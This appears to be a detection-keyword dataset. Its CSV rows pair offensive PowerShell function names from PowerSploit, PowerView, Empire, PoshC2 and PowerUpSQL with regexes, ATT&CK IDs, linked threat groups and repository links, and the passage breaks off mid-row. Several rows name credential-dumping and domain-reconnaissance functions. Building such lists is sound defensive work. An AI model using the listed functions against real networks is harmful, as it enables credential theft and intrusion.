"*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46115"
"*Get-ModifiableService*",".{0,1000}Get\-ModifiableService.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46116"
"*Get-MSSQLAllCredentials*",".{0,1000}Get\-MSSQLAllCredentials.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","0","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46120"
"*Get-MSSQLAllCredentials*",".{0,1000}Get\-MSSQLAllCredentials.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46121"
"*Get-MSSQLCredentialPasswords*",".{0,1000}Get\-MSSQLCredentialPasswords.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46122"
"*Get-MSSQLCredentialPasswords*",".{0,1000}Get\-MSSQLCredentialPasswords.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46123"
"*Get-MSSQLLinkPasswords*",".{0,1000}Get\-MSSQLLinkPasswords.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","46124"
"*Get-NestedGroupMembership *",".{0,1000}Get\-NestedGroupMembership\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46125"
"*Get-NestedGroupMembership.ps1*",".{0,1000}Get\-NestedGroupMembership\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","46126"
"*Get-NetComputer -Unconstrainuser*",".{0,1000}Get\-NetComputer\s\-Unconstrainuser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46127"
"*Get-NetDomainController*",".{0,1000}Get\-NetDomainController.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46128"
"*Get-NetDomainTrust*",".{0,1000}Get\-NetDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46129"
"*get-netfileserver -domain *",".{0,1000}get\-netfileserver\s\-domain\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46130"
"*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46131"
"*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46132"
"*Get-NetForestDomain*",".{0,1000}Get\-NetForestDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46134"
"*Get-NetGPO -UserIdentity *",".{0,1000}Get\-NetGPO\s\-UserIdentity\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46137"
"*Get-NetGPOGroup*",".{0,1000}Get\-NetGPOGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46138"
"*Get-NetLocalGroup*",".{0,1000}Get\-NetLocalGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46141"
"*Get-NetLocalGroupMember*",".{0,1000}Get\-NetLocalGroupMember.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46142"
"*Get-NetLoggedon -*",".{0,1000}Get\-NetLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46143"
"*Get-NetLoggedon*",".{0,1000}Get\-NetLoggedon.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46144"
"*Get-NetLoggedon*",".{0,1000}Get\-NetLoggedon.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46145"
"*Get-NetNTLM-Hash *",".{0,1000}Get\-NetNTLM\-Hash\s.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","0","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","46146"
"*Get-NetRDPSession -*",".{0,1000}Get\-NetRDPSession\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46147"
"*Get-NetRDPSession*",".{0,1000}Get\-NetRDPSession.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46148"
"*Get-NetRDPSession*",".{0,1000}Get\-NetRDPSession.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46149"
"*Get-NetSessionEnum.ps1*",".{0,1000}Get\-NetSessionEnum\.ps1.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","1","N/A","N/A","7","9","N/A","N/A","N/A","N/A","46151"
"*Get-NetUser -SPN*",".{0,1000}Get\-NetUser\s\-SPN.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 